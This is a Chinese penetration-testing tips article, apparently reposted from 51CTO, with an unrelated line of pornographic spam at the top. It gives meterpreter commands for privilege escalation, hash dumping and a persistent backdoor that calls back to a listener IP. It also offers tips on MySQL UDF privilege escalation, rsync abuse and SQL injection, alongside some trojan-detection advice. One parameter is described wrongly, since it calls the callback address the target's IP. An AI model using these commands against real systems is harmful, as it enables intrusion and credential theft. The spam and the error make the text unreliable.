自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

滲透測(cè)試筆記四

安全 黑客攻防
滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

滲透筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

1、在Webshell中,如果上傳文件時(shí)提示缺少對(duì)象??梢試L試寫(xiě)一句話,用菜刀連接之后用菜刀上傳文件。

2、使用meterpreter的hashdump提取windows口令的哈希值:

  1. meterpreter > getuid                //獲知當(dāng)前權(quán)限級(jí)別 
  2. meterpreter > getsystem        //提升權(quán)限 
  3. meterpreter > run hashdump 

3、網(wǎng)站http://www.md5decrypter.co.uk/,可提供對(duì)NTLM/LM hash值的在線解密(小編注:這個(gè)網(wǎng)站破解MD5的命中率也很高哦)。

3、使用meterpreter建立后門(mén):

  1. meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1 
  2. -A參數(shù)用于在攻擊方機(jī)器上自動(dòng)啟動(dòng)監(jiān)聽(tīng)程序。 
  3. -S參數(shù)表示將后門(mén)程序設(shè)置為Windows系統(tǒng)啟動(dòng)時(shí)加載。 
  4. -U參數(shù)表示后門(mén)設(shè)置為用戶登陸系統(tǒng)時(shí)自動(dòng)執(zhí)行。 
  5. -i參數(shù)用于設(shè)置后門(mén)回連到代理處理程序的時(shí)間間隔 
  6. -p是端口號(hào) 
  7. -r是目標(biāo)機(jī)器的ip地址 

4、網(wǎng)絡(luò)縱深防御思想:作為一個(gè)公司,它會(huì)為物理線路聘用一個(gè)巡線員(第一層),在工作組交換機(jī)上做端口安全(第二層),在邊界路由器上做訪問(wèn)列表(第三層),在防火墻中建立DMZ區(qū)和包過(guò)濾(第四層),設(shè)置IDS/IDP監(jiān)測(cè)/阻攔(第三至七層),建立SSL通道(第六層),設(shè)置內(nèi)容過(guò)濾(第七層),提供AAA服務(wù)(第七層),進(jìn)行漏洞掃描(第四至七層)和病毒掃描(第七層)等。

——摘自《IT安全面試攻略》

5、IPS設(shè)備可以提供攻擊檢測(cè)和防御兩種功能,如果以鏡像方式接入,就使用反應(yīng)機(jī)制;如果以串行方式接入,就使用阻斷機(jī)制。

6、根據(jù)ip獲知對(duì)方電腦的名稱:ping -a ip地址,

如:ping -a 192.168.235.253

 

QQ截圖20131205215004

 

7、在系統(tǒng)“windows”文件夾下,點(diǎn)擊打開(kāi)“system.ini”文件,在代碼中如果有[boot]代碼,其中shell語(yǔ)句的格式一般為“shell=文件名”,如果后面還跟有一個(gè)文件名(如shell=文件名+文件名),則很可能是木馬程序。

8、在系統(tǒng)“windows”文件夾下,點(diǎn)擊打開(kāi)“win.ini”文件,在代碼中如果有“run=?”或者“load=?”代碼類型,一定要注意其后的文件。一般情況下,“run=”和“load=”后面就沒(méi)有內(nèi)容了,如果有路徑或不熟悉的文件名,可能就是木馬程序。

9、木馬隱藏的方式很多,一般都隱藏在注冊(cè)表的

1HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

目錄下。查看鍵值中有沒(méi)有不熟悉的可執(zhí)行文件,該類文件可能就是木馬程序。

10、專門(mén)捕獲網(wǎng)頁(yè)的嗅探器——艾菲網(wǎng)頁(yè)偵探:艾菲網(wǎng)頁(yè)偵探是一個(gè)HTTP協(xié)議的網(wǎng)絡(luò)嗅探器,專門(mén)捕捉局域網(wǎng)中含有HTTP協(xié)議的數(shù)據(jù)包,并對(duì)其進(jìn)行分析,找出符合過(guò)濾器的那些HTTP通信內(nèi)容。

11、常見(jiàn)的windows XP系統(tǒng)漏洞:RDP漏洞、遠(yuǎn)程明文賬戶名傳送漏洞、UPnP緩沖溢出漏洞、熱鍵漏洞、拒絕服務(wù)漏洞

12、常見(jiàn)window 7系統(tǒng)漏洞:內(nèi)核驅(qū)動(dòng)程序中的漏洞、輔助驅(qū)動(dòng)程序中的漏洞、IE的積累性安全更新漏洞、顏色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。

13、清除BIOS密碼之魔法攻擊法:如果你能進(jìn)入系統(tǒng),可以用BiosPwds、CmosPwd等軟件清除。(小編注:一般就別想了)

14、清除BIOS密碼之物理攻擊法:關(guān)閉電源,將主板上的正確跳線帽用專業(yè)工具挑出,將跳線帽由原來(lái)標(biāo)示為“1”、“2”針腳套在標(biāo)示為“2”、“3”的針腳上,再將跳線帽復(fù)原,打開(kāi)電源,即可發(fā)現(xiàn)BIOS密碼已清除。如果遇到較老的機(jī)子,可是拆掉電池、再用導(dǎo)電工具短接清除密碼。

15、mysql數(shù)據(jù)庫(kù)擁有讀寫(xiě)文件權(quán)限時(shí),成功寫(xiě)入文件的條件需單引號(hào)不轉(zhuǎn)義、不可覆蓋已存在文件、必須為最后一條語(yǔ)句。因此magic_quotes_gpc必須為0ff。

16、滲透提權(quán)過(guò)程中,得知mysql數(shù)據(jù)庫(kù)連接賬號(hào)和密碼時(shí)可以嘗試UDF方式提權(quán),前提是系統(tǒng)必須為windows。當(dāng)然如果權(quán)限高的話,還可以使用mof寫(xiě)入系統(tǒng)的方式提權(quán)。

17、滲透過(guò)程中如目標(biāo)開(kāi)啟rsync服務(wù),默認(rèn)873端口,可嘗試無(wú)口令登錄,權(quán)限設(shè)置不足的可直接上傳文件,最不濟(jì)也可查看目標(biāo)站點(diǎn)文件。

18、端口轉(zhuǎn)發(fā)時(shí)如果lcx不起作用,可嘗試reduh這個(gè)工具,不過(guò)速度稍微有點(diǎn)捉急!(其實(shí)那速度會(huì)讓你有砸鍵盤(pán)的沖動(dòng))

19、數(shù)字型注入中,無(wú)單引號(hào)注入方法有兩種,一種是定義注入字符串為16進(jìn)制賦值變量@r,然后exec(@r)執(zhí)行;另外一種是使用char()函數(shù)和“+”號(hào)來(lái)進(jìn)行。

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2014-02-18 15:53:04

2013-11-28 11:29:39

2013-11-28 13:03:17

2013-12-30 13:11:03

2014-04-03 09:35:28

2013-11-28 10:32:10

2013-12-24 13:15:59

2009-01-07 21:00:05

2014-11-21 10:32:33

2014-05-16 10:55:47

Spark

2010-08-03 22:09:16

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測(cè)試網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2016-09-09 01:14:17

2017-07-24 17:00:49

2022-07-19 16:59:25

安全漏洞Web

2010-09-13 11:05:08

2013-05-27 13:37:06

2010-09-09 21:10:22

2010-09-16 16:08:46

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)